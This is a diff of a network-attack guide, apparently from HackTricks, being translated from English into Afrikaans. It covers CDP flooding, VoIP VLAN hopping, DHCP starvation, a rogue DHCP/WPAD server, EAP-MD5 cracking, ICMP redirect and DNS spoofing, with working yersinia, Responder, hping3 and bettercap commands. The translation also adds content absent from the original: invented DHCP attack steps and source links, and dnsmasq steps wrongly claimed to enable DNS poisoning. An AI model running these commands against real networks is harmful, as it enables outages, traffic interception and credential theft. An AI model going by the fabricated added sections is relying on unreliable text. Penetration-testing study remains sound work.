layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing" ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages ``` +### CDP Aanvalle -### CDP Attacks +CISCO Discovery Protocol (CDP) is noodsaaklik vir kommunikasie tussen CISCO-toestelle, wat hulle in staat stel om **elkaar te identifiseer en konfigurasiebesonderhede te deel**. -CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to **identify each other and share configuration details**. +#### Passiewe Data Versameling -#### Passive Data Collection +CDP is gekonfigureer om inligting deur alle poorte uit te saai, wat 'n sekuriteitsrisiko kan veroorsaak. 'n Aanvaller kan, nadat hy aan 'n skakelaarpoort gekoppel het, netwerksnuffelaars soos **Wireshark**, **tcpdump**, of **Yersinia** gebruik. Hierdie aksie kan sensitiewe data oor die netwerktoestel onthul, insluitend die model en die weergawe van Cisco IOS wat dit gebruik. Die aanvaller kan dan spesifieke kwesbaarhede in die geïdentifiseerde Cisco IOS-weergawe teiken. -CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like **Wireshark**, **tcpdump**, or **Yersinia**. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version. - -#### Inducing CDP Table Flooding - -A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing: +#### Induseer CDP Tabel Oorstroming +'n Meer aggressiewe benadering behels die lanceer van 'n Denial of Service (DoS) aanval deur die skakelaar se geheue te oorweldig, terwyl dit voorgee om legitieme CISCO-toestelle te wees. Hieronder is die opdragvolgorde vir die inisieer van so 'n aanval met behulp van Yersinia, 'n netwerkwerktuig wat ontwerp is vir toetsdoeleindes: ```bash sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices # Alternatively, for a GUI approach: sudo yersinia -G ``` +Tydens hierdie aanval word die CPU van die skakelaar en die CDP-buurtabel swaar belas, wat dikwels verwys word na as **"netwerk verlamming"** as gevolg van die oormatige gebruik van hulpbronne. -During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as **“network paralysis”** due to the excessive resource consumption. - -#### CDP Impersonation Attack - +#### CDP Impersonation Aanval ```bash sudo yersinia cdp -attack 2 #Simulate a new CISCO device sudo yersinia cdp -attack 0 #Send a CDP packet ``` +Jy kan ook [**scapy**](https://github.com/secdev/scapy/) gebruik. Maak seker dat jy dit installeer met die `scapy/contrib` pakkie. -You could also use [**scapy**](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package. +### VoIP Aanvalle en die VoIP Hopper Gereedskap -### VoIP Attacks and the VoIP Hopper Tool +VoIP-telefone, wat toenemend geïntegreer word met IoT-toestelle, bied funksionaliteite soos die ontgrendeling van deure of die beheer van termostate deur middel van spesiale telefoonnommers. Hierdie integrasie kan egter sekuriteitsrisiko's inhou. -VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks. +Die gereedskap [**voiphopper**](http://voiphopper.sourceforge.net) is ontwerp om 'n VoIP-telefoon in verskillende omgewings na te boots (Cisco, Avaya, Nortel, Alcatel-Lucent). Dit ontdek die VLAN-ID van die spraaknetwerk deur gebruik te maak van protokolle soos CDP, DHCP, LLDP-MED en 802.1Q ARP. -The tool [**voiphopper**](http://voiphopper.sourceforge.net) is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP. +**VoIP Hopper** bied drie modusse vir die Cisco Discovery Protocol (CDP): -**VoIP Hopper** offers three modes for the Cisco Discovery Protocol (CDP): +1. **Sniff Modus** (`-c 0`): Analiseer netwerkpakette om die VLAN-ID te identifiseer. +2. **Spoof Modus** (`-c 1`): Genereer aangepaste pakkette wat dieselfde is as dié van 'n werklike VoIP-toestel. +3. **Spoof met Voorgemaakte Pakket Modus** (`-c 2`): Stuur pakkette wat identies is aan dié van 'n spesifieke Cisco IP-telefoonmodel. -1. **Sniff Mode** (`-c 0`): Analyzes network packets to identify the VLAN ID. -2. **Spoof Mode** (`-c 1`): Generates custom packets mimicking those of an actual VoIP device. -3. **Spoof with Pre-made Packet Mode** (`-c 2`): Sends packets identical to those of a specific Cisco IP phone model. +Die voorkeurmodus vir spoed is die derde een. Dit vereis die spesifisering van: -The preferred mode for speed is the third one. It requires specifying: +- Die aanvaller se netwerkinterface (`-i` parameter). +- Die naam van die nagebootste VoIP-toestel (`-E` parameter), wat voldoen aan die Cisco-naamformaat (bv. SEP gevolg deur 'n MAC-adres). -- The attacker's network interface (`-i` parameter). -- The name of the VoIP device being emulated (`-E` parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address). +In korporatiewe omgewings kan 'n bestaande VoIP-toestel nageboots word deur: -In corporate settings, to mimic an existing VoIP device, one might: - -- Inspect the MAC label on the phone. -- Navigate the phone's display settings to view model information. -- Connect the VoIP device to a laptop and observe CDP requests using Wireshark. - -An example command to execute the tool in the third mode would be: +- Die MAC-etiket op die telefoon te ondersoek. +- Deur die telefoon se vertooningsinstellings te navigeer om modelinligting te sien. +- Die VoIP-toestel aan 'n rekenaar te koppel en CDP-versoeke te ondersoek met behulp van Wireshark. +'n Voorbeeldopdrag om die gereedskap in die derde modus uit te voer, sou wees: ```bash voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2 ``` +#### Opname -### DHCP Attacks +DHCP (Dynamic Host Configuration Protocol) is 'n protokol wat gebruik word om IP-adresse en ander netwerkinstellings aan 'n toestel in 'n netwerk toe te ken. Dit is 'n belangrike stap in die opstel van 'n netwerkverbinding. Tydens 'n pentest kan jy DHCP-aanvalle gebruik om inligting oor die netwerk te versamel. -#### Enumeration +Daar is verskeie metodes om DHCP-inligting te ondersoek en op te neem: +1. **DHCP Discovery**: Hierdie metode behels die gebruik van 'n DHCP Discovery-hulpmiddel om 'n DHCP-aanvraag na die netwerk te stuur en die reaksie te ontleed. Dit kan help om die DHCP-bedieners in die netwerk te identifiseer. +2. **DHCP Starvation**: Hierdie aanval behels die oorweldiging van die DHCP-bedieners met valse DHCP-aanvrae. Dit kan lei tot 'n uitputting van die beskikbare IP-adresse en 'n versteuring van die netwerk. +3. **DHCP Spoofing**: Hierdie aanval behels die stuur van valse DHCP-antwoorde na die kliënttoestelle in die netwerk. Dit kan lei tot die oorname van die IP-adres van 'n ander toestel en die onderskepping van netwerkverkeer. + +#### DHCP Discovery + +Die DHCP Discovery-metode kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Discovery-hulpmiddel soos `dhcpdump` of `dhcpig`. +2. Stuur 'n DHCP Discovery-aanvraag na die netwerk met behulp van die hulpmiddel. +3. Ontleed die reaksie om die DHCP-bedieners in die netwerk te identifiseer. +4. Analiseer die inligting om potensiële doelwitte vir verdere aanvalle te identifiseer. + +#### DHCP Starvation + +Die DHCP Starvation-aanval kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Starvation-hulpmiddel soos `yersinia` of `dhcpstarv`. +2. Stuur valse DHCP-aanvrae na die DHCP-bedieners in die netwerk. +3. Monitor die netwerk om te sien of die DHCP-bedieners reageer. +4. As die DHCP-bedieners reageer, kan dit dui op 'n moontlike kwesbaarheid in die netwerk. + +#### DHCP Spoofing + +Die DHCP Spoofing-aanval kan uitgevoer word deur die volgende stappe te volg: + +1. Installeer 'n DHCP Spoofing-hulpmiddel soos `dhcpig` of `ettercap`. +2. Stel die hulpmiddel in om valse DHCP-antwoorde na die kliënttoestelle in die netwerk te stuur. +3. Monitor die netwerk om te sien of die kliënttoestelle die valse DHCP-antwoorde aanvaar. +4. As die kliënttoestelle die valse DHCP-antwoorde aanvaar, kan dit lei tot die oorname van IP-adresse en die onderskepping van netwerkverkeer. + +#### Voorkoming + +Om DHCP-aanvalle te voorkom, kan die volgende maatreëls geneem word: + +1. Implementeer 'n sterk netwerksekuriteitsbeleid wat die gebruik van DHCP-aanvalle verbied. +2. Monitor die netwerk vir verdagte DHCP-aktiwiteit en reageer vinnig op enige inbreukpogings. +3. Stel 'n DHCP-snoepie op om die netwerk teen DHCP-aanvalle te beskerm. +4. Verseker dat alle toestelle in die netwerk opgedateer en gepatch is om bekende DHCP-kwesbaarhede te voorkom. + +#### Bronne + +- [DHCP Starvation](https://book.hacktricks.xyz/pentesting/pentesting-network/dhcp-starvation) +- [DHCP Spoofing](https://book.hacktricks.xyz/pentesting/pentesting-network/dhcp-spoofing) ```bash nmap --script broadcast-dhcp-discover Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT WARNING: No targets were specified, so 0 hosts scanned. Pre-scan script results: -| broadcast-dhcp-discover: -| Response 1 of 1: +| broadcast-dhcp-discover: +| Response 1 of 1: | IP Offered: 192.168.1.250 | DHCP Message Type: DHCPOFFER | Server Identifier: 192.168.1.1 @@ -563,68 +583,61 @@ Pre-scan script results: |_ Domain Name: mynet Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds ``` - **DoS** -**Two types of DoS** could be performed against DHCP servers. The first one consists on **simulate enough fake hosts to use all the possible IP addresses**.\ -This attack will work only if you can see the responses of the DHCP server and complete the protocol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). For example, this is **not possible in Wifi networks**. - -Another way to perform a DHCP DoS is to send a **DHCP-RELEASE packet using as source code every possible IP**. Then, the server will think that everybody has finished using the IP. +Daar kan **twee tipes DoS** teen DHCP-bedieners uitgevoer word. Die eerste een behels om genoeg valse gasheer te simuleer om al die moontlike IP-adresse te gebruik.\ +Hierdie aanval sal slegs werk as jy die antwoorde van die DHCP-bediener kan sien en die protokol voltooi (**Discover** (Rekenaar) --> **Offer** (bediener) --> **Request** (Rekenaar) --> **ACK** (bediener)). Byvoorbeeld, dit is **nie moontlik in WiFi-netwerke** nie. +'n Ander manier om 'n DHCP DoS uit te voer, is om 'n **DHCP-RELEASE-pakket te stuur met behulp van elke moontlike IP as bronkode**. Dan sal die bediener dink dat almal klaar is met die gebruik van die IP. ```bash yersinia dhcp -attack 1 yersinia dhcp -attack 3 #More parameters are needed ``` +'n Meer outomatiese manier om dit te doen, is deur die hulpmiddel [DHCPing](https://github.com/kamorin/DHCPig) te gebruik. -A more automatic way of doing this is using the tool [DHCPing](https://github.com/kamorin/DHCPig) +Jy kan die genoemde DoS-aanvalle gebruik om kliënte te dwing om nuwe leases binne die omgewing te verkry en om legitieme bedieners uit te put sodat hulle onreageerbaar word. So wanneer die legitieme bedieners probeer herverbind, **kan jy skadelike waardes bedien soos in die volgende aanval genoem**. -You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**. +#### Stel skadelike waardes in -#### Set malicious values +'n Skelm DHCP-bediener kan opgestel word deur die DHCP-skripsie wat by `/usr/share/responder/DHCP.py` geleë is, te gebruik. Dit is nuttig vir netwerkaanvalle, soos die vasvang van HTTP-verkeer en geloofsbriewe, deur verkeer na 'n skadelike bediener om te lei. Stel egter 'n skelm roeteringstoestel op is minder effektief omdat dit slegs uitgaande verkeer van die kliënt toelaat en die antwoorde van die werklike roeteringstoestel mis. Daarom word dit aanbeveel om 'n skelm DNS- of WPAD-bediener op te stel vir 'n meer effektiewe aanval. -A rogue DHCP server can be set up using the DHCP script located at `/usr/share/responder/DHCP.py`. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective since it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack. +Hieronder is die opdragopsies vir die konfigurering van die skelm DHCP-bediener: -Below are the command options for configuring the rogue DHCP server: - -- **Our IP Address (Gateway Advertisement)**: Use `-i 10.0.0.100` to advertise your machine's IP as the gateway. -- **Local DNS Domain Name**: Optionally, use `-d example.org` to set a local DNS domain name. -- **Original Router/Gateway IP**: Use `-r 10.0.0.1` to specify the IP address of the legitimate router or gateway. -- **Primary DNS Server IP**: Use `-p 10.0.0.100` to set the IP address of the rogue DNS server you control. -- **Secondary DNS Server IP**: Optionally, use `-s 10.0.0.1` to set a secondary DNS server IP. -- **Netmask of Local Network**: Use `-n 255.255.255.0` to define the netmask for the local network. -- **Interface for DHCP Traffic**: Use `-I eth1` to listen for DHCP traffic on a specific network interface. -- **WPAD Configuration Address**: Use `-w “http://10.0.0.100/wpad.dat”` to set the address for WPAD configuration, assisting in web traffic interception. -- **Spoof Default Gateway IP**: Include `-S` to spoof the default gateway IP address. -- **Respond to All DHCP Requests**: Include `-R` to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected. - -By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively. +- **Ons IP-adres (Roeteringstoestel-advertensie)**: Gebruik `-i 10.0.0.100` om jou masjien se IP-adres as die roeteringstoestel te adverteer. +- **Plaaslike DNS-domeinnaam**: Opsioneel, gebruik `-d example.org` om 'n plaaslike DNS-domeinnaam in te stel. +- **Oorspronklike Router/Roeteringstoestel-IP**: Gebruik `-r 10.0.0.1` om die IP-adres van die legitieme router of roeteringstoestel te spesifiseer. +- **Primêre DNS-bediener-IP**: Gebruik `-p 10.0.0.100` om die IP-adres van die skelm DNS-bediener wat jy beheer, in te stel. +- **Sekondêre DNS-bediener-IP**: Opsioneel, gebruik `-s 10.0.0.1` om 'n sekondêre DNS-bediener-IP in te stel. +- **Netmasker van Plaaslike Netwerk**: Gebruik `-n 255.255.255.0` om die netmasker vir die plaaslike netwerk te definieer. +- **Koppelvlak vir DHCP-verkeer**: Gebruik `-I eth1` om te luister vir DHCP-verkeer op 'n spesifieke netwerkkoppelvlak. +- **WPAD-konfigurasie-adres**: Gebruik `-w "http://10.0.0.100/wpad.dat"` om die adres vir WPAD-konfigurasie in te stel, wat help met die onderskepping van webverkeer. +- **Spoof Verstekroeteringstoestel-IP**: Sluit `-S` in om die IP-adres van die verstekroeteringstoestel te vervals. +- **Reageer op Alle DHCP-Aanvrae**: Sluit `-R` in om die bediener op alle DHCP-aanvrae te laat reageer, maar wees bewus dat dit lawaaierig is en opgespoor kan word. +Deur hierdie opsies korrek te gebruik, kan 'n skelm DHCP-bediener opgestel word om netwerkverkeer doeltreffend te onderskep. ```python # Example to start a rogue DHCP server with specified options !python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R ``` +### **EAP Aanvalle** -### **EAP Attacks** +Hier is 'n paar aanvalstaktieke wat teen 802.1X-implementasies gebruik kan word: -Here are some of the attack tactics that can be used against 802.1X implementations: - -* Active brute-force password grinding via EAP -* Attacking the RADIUS server with malformed EAP content _\*\*_(exploits) -* EAP message capture and offline password cracking (EAP-MD5 and PEAP) -* Forcing EAP-MD5 authentication to bypass TLS certificate validation -* Injecting malicious network traffic upon authenticating using a hub or similar - -If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using: +* Aktiewe brute-force wagwoord slyp deur middel van EAP +* Aanval op die RADIUS-bediener met misvormde EAP-inhoud _(uitbuitings)_ +* EAP-boodskap vaslegging en aflyn wagwoordkraking (EAP-MD5 en PEAP) +* Dwang van EAP-MD5-verifikasie om TLS-sertifikaatvalidering te omseil +* Injeksie van skadelike netwerkverkeer tydens verifikasie met behulp van 'n hub of soortgelyk +As die aanvaller tussen die slagoffer en die verifikasiebediener is, kan hy probeer om (indien nodig) die verifikasieprotokol na EAP-MD5 te degradeer en die verifikasiepoging vas te vang. Daarna kan hy dit brute-force gebruik deur: ``` eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ``` +### FHRP (GLBP & HSRP) Aanvalle -### FHRP (GLBP & HSRP) Attacks +**FHRP** (Eerste Sprong Redundansie Protokol) is 'n klas van netwerkprotokolle wat ontwerp is om 'n warm redundante roetesisteem te skep. Met FHRP kan fisiese roetingsapparate gekombineer word in 'n enkele logiese toestel, wat fouttoleransie verhoog en help om die las te verdeel. -**FHRP** (First Hop Redundancy Protocol) is a class of network protocols designed to **create a hot redundant routing system**. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps distribute the load. - -**Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.** +**Cisco Systems-ingenieurs het twee FHRP-protokolle ontwikkel, GLBP en HSRP.** {% content-ref url="glbp-and-hsrp-attacks.md" %} [glbp-and-hsrp-attacks.md](glbp-and-hsrp-attacks.md) @@ -632,89 +645,111 @@ eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt ### RIP -Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcasted to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6. +Daar is drie weergawes van die Routing Information Protocol (RIP) bekend: RIP, RIPv2 en RIPng. Datagramme word deur RIP en RIPv2 na eweknieë gestuur via poort 520 met behulp van UDP, terwyl datagramme na UDP-poort 521 via IPv6-multisending deur RIPng uitgesaai word. Ondersteuning vir MD5-verifikasie is deur RIPv2 ingevoer. Aan die ander kant word inheemse verifikasie nie deur RIPng ingesluit nie; in plaas daarvan word daar staatgemaak op opsionele IPsec AH- en ESP-koppe in IPv6. -- **RIP and RIPv2:** Communication is done through UDP datagrams on port 520. -- **RIPng:** Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast. +- **RIP en RIPv2:** Kommunikasie vind plaas deur UDP-datagramme op poort 520. +- **RIPng:** Maak gebruik van UDP-poort 521 om datagramme via IPv6-multisending uit te saai. -Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers in IPv6. +Let daarop dat RIPv2 MD5-verifikasie ondersteun terwyl RIPng nie inheemse verifikasie insluit nie, maar staatmaak op IPsec AH- en ESP-koppe in IPv6. -### EIGRP Attacks +### EIGRP Aanvalle -**EIGRP (Enhanced Interior Gateway Routing Protocol)** is a dynamic routing protocol. **It is a distance-vector protocol.** If there is **no authentication** and configuration of passive interfaces, an **intruder** can interfere with EIGRP routing and cause **routing tables poisoning**. Moreover, EIGRP network (in other words, autonomous system) **is flat and has no segmentation into any zones**. If an **attacker injects a route**, it is likely that this route will **spread** throughout the autonomous EIGRP system. +**EIGRP (Enhanced Interior Gateway Routing Protocol)** is 'n dinamiese roetingsprotokol. Dit is 'n afstand-vector protokol. As daar **geen verifikasie** en konfigurasie van passiewe interfaces is nie, kan 'n **indringer** inmeng met EIGRP-roetings en **roetetabellevergiftiging** veroorsaak. Verder is die EIGRP-netwerk (met ander woorde, outonome stelsel) **plat en het geen segmentering in enige sones nie**. As 'n **aanvaller 'n roete inspuit**, is dit waarskynlik dat hierdie roete deur die outonome EIGRP-stelsel sal **versprei**. -To attack a EIGRP system requires **establishing a neighbourhood with a legitimate EIGRP route**r, which opens up a lot of possibilities, from basic reconnaissance to various injections. +Om 'n EIGRP-stelsel aan te val, vereis dit **die vestiging van 'n nabuurskap met 'n wettige EIGRP-roeteerder**, wat baie moontlikhede bied, van basiese verkenning tot verskeie inspuitings. -[**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. +[**FRRouting**](https://frrouting.org/) stel jou in staat om **'n virtuele router te implementeer wat BGP, OSPF, EIGRP, RIP en ander protokolle ondersteun**. Al wat jy hoef te doen, is om dit op jou aanvaller se stelsel te implementeer en jy kan eintlik voorgee om 'n wettige router in die roetingsdomein te wees. {% content-ref url="eigrp-attacks.md" %} [eigrp-attacks.md](eigrp-attacks.md) {% endcontent-ref %} -[**Coly**](https://code.google.com/p/coly/) has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations. +[**Coly**](https://code.google.com/p/coly/) het die vermoë om EIGRP (Enhanced Interior Gateway Routing Protocol) uitsendings te onderskep. Dit maak ook die inspuiting van pakkies moontlik, wat gebruik kan word om roetingskonfigurasies te verander. ### OSPF -In Open Shortest Path First (OSPF) protocol **MD5 authentication is commonly employed to ensure secure communication between routers**. However, this security measure can be compromised using tools like Loki and John the Ripper. These tools are capable of capturing and cracking MD5 hashes, exposing the authentication key. Once this key is obtained, it can be used to introduce new routing information. To configure the route parameters and establish the compromised key, the _Injection_ and _Connection_ tabs are utilized, respectively. +In die Open Shortest Path First (OSPF) protokol word **MD5-verifikasie algemeen gebruik om veilige kommunikasie tussen roeteerders te verseker**. Hierdie veiligheidsmaatreël kan egter gekompromitteer word deur middel van gereedskap soos Loki en John the Ripper. Hierdie gereedskap is in staat om MD5-hashes vas te vang en te kraak, wat die verifikasiesleutel blootstel. Sodra hierdie sleutel verkry is, kan dit gebruik word om nuwe roetingsinligting in te voer. Om die roete-parameters te konfigureer en die gekompromitteerde sleutel te vestig, word onderskeidelik die _Injection_ en _Connection_ lêers gebruik. -- **Capturing and Cracking MD5 Hashes:** Tools such as Loki and John the Ripper are used for this purpose. -- **Configuring Route Parameters:** This is done through the _Injection_ tab. -- **Setting the Compromised Key:** The key is configured under the _Connection_ tab. +- **Vasvang en Kraak van MD5-hashes:** Gereedskap soos Loki en John the Ripper word hiervoor gebruik. +- **Konfigurering van Roete-parameters:** Dit word gedoen deur middel van die _Injection_ lêer. +- **Vestiging van die Gekompromitteerde Sleutel:** Die sleutel word gekonfigureer onder die _Connection_ lêer. -### Other Generic Tools & Sources +### Ander Algemene Gereedskap & Bronne -* [**Above**](https://github.com/c4s73r/Above): Tool to scan network traffic and find vulnerabilities -* You can find some **more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet)**. +* [**Above**](https://github.com/c4s73r/Above): Gereedskap om netwerkverkeer te skandeer en kwesbaarhede te vind +* Jy kan **meer inligting oor netwerkaanvalle [hier](https://github.com/Sab0tag3d/MITM-cheatsheet)** vind. ## **Spoofing** -The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses. - +Die aanvaller stel al die netwerkparameters (GW, IP, DNS) van die nuwe lid van die netwerk in deur valse DHCP-antwoorde te stuur. ```bash Ettercap yersinia dhcp -attack 2 #More parameters are needed ``` - ### ARP Spoofing -Check the [previous section](./#arp-spoofing). +Kyk na die [vorige afdeling](./#arp-spoofing). ### ICMPRedirect -ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker. - +ICMP-omleiding behels die stuur van 'n ICMP-pakket tipe 1 kode 5 wat aandui dat die aanvaller die beste manier is om 'n IP te bereik. Dan, wanneer die slagoffer die IP wil kontak, sal dit die pakket deur die aanvaller stuur. ```bash Ettercap icmp_redirect hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5] ``` - ### DNS Spoofing -The attacker will resolve some (or all) the domains that the victim ask for. - +Die aanvaller sal sommige (of al) die domeine wat die slagoffer vra, oplos. ```bash set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on ``` +**Stel jou eie DNS in met dnsmasq** -**Configure own DNS with dnsmasq** +Om jou eie DNS in te stel met dnsmasq, kan jy die volgende stappe volg: +1. Installeer dnsmasq op jou bediener: + ``` + sudo apt-get install dnsmasq + ``` + +2. Maak 'n nuwe konfigurasie-lêer vir dnsmasq: + ``` + sudo nano /etc/dnsmasq.conf + ``` + +3. Voeg die volgende reëls by in die konfigurasie-lêer: + ``` + interface=eth0 + listen-address=127.0.0.1 + bind-interfaces + no-resolv + server=8.8.8.8 + server=8.8.4.4 + ``` + +4. Stel jou DNS-instellings in op jou bediener se netwerkinstellings om na 127.0.0.1 te verwys. + +5. Herlaai dnsmasq om die veranderinge toe te pas: + ``` + sudo systemctl reload dnsmasq + ``` + +Nou is jou dnsmasq DNS ingestel en gereed om DNS-navrae te hanteer. Jy kan dit gebruik om DNS-verwysings te manipuleer en aanvalle soos DNS-vergiftiging uit te voer. ```bash apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon dig @localhost domain.example.com # Test the configured DNS ``` +### Plaaslike Hekke -### Local Gateways - -Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding. - +Daar is dikwels verskeie roetes na stelsels en netwerke. Nadat 'n lys van MAC-adresse binne die plaaslike netwerk opgestel is, gebruik _gateway-finder.py_ om gasheerstelsels te identifiseer wat IPv4 deurstuur ondersteun. ``` root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git root@kali:~# cd gateway-finder/ root@kali:~# arp-scan -l | tee hosts.txt Interface: eth0, datalink type: EN10MB (Ethernet) -Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) +Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 10.0.0.100 00:13:72:09:ad:76 Dell Inc. 10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION 10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp. @@ -726,67 +761,58 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder [+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100] ``` +### [Spoofing LLMNR, NBT-NS, en mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +Vir plaaslike gasheeroplossing wanneer DNS-opsoekings nie suksesvol is nie, steun Microsoft-stelsels op **Link-Local Multicast Name Resolution (LLMNR)** en die **NetBIOS Name Service (NBT-NS)**. Soortgelyk maak **Apple Bonjour** en **Linux zero-configuration**-implementasies gebruik van **Multicast DNS (mDNS)** om stelsels binne 'n netwerk te ontdek. As gevolg van die ongeagte aard van hierdie protokolle en hul werking oor UDP, uitsaai-boodskappe, kan dit deur aanvallers uitgebuit word om gebruikers na kwaadwillige dienste om te lei. -For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services. - -You can impersonate services that are searched by hosts using Responder to send fake responses.\ -Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Jy kan dienste naboots deur Responder te gebruik om valse reaksies te stuur.\ +Lees hier meer inligting oor [hoe om dienste met Responder te naboots](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). ### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -Browsers commonly employ the **Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings**. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms: +Webblaaier maak gewoonlik gebruik van die **Web Proxy Auto-Discovery (WPAD) protokol om outomaties proksi-instellings te bekom**. Dit behels die ophaling van konfigurasiebesonderhede van 'n bediener, spesifiek deur 'n URL soos "http://wpad.example.org/wpad.dat". Die ontdekking van hierdie bediener deur die kliënte kan plaasvind deur verskeie meganismes: -- Through **DHCP**, where the discovery is facilitated by utilizing a special code 252 entry. -- By **DNS**, which involves searching for a hostname labeled _wpad_ within the local domain. -- Via **Microsoft LLMNR and NBT-NS**, which are fallback mechanisms used in cases where DNS lookups do not succeed. +- Deur **DHCP**, waar die ontdekking gefasiliteer word deur 'n spesiale kode 252-inskrywing te gebruik. +- Deur **DNS**, wat die soeke na 'n gasheernaam met die etiket _wpad_ binne die plaaslike domein behels. +- Via **Microsoft LLMNR en NBT-NS**, wat terugvalmeganismes is wat gebruik word in gevalle waar DNS-opsoekings nie slaag nie. -The tool Responder takes advantage of this protocol by acting as a **malicious WPAD server**. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. To dive deeper into how services can be impersonated using Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). +Die hulpmiddel Responder maak gebruik van hierdie protokol deur as 'n **kwaadwillige WPAD-bedieners** op te tree. Dit maak gebruik van DHCP, DNS, LLMNR en NBT-NS om kliënte te mislei om daarmee te verbind. Om dieper in te gaan op hoe dienste met behulp van Responder nageboots kan word, [kyk 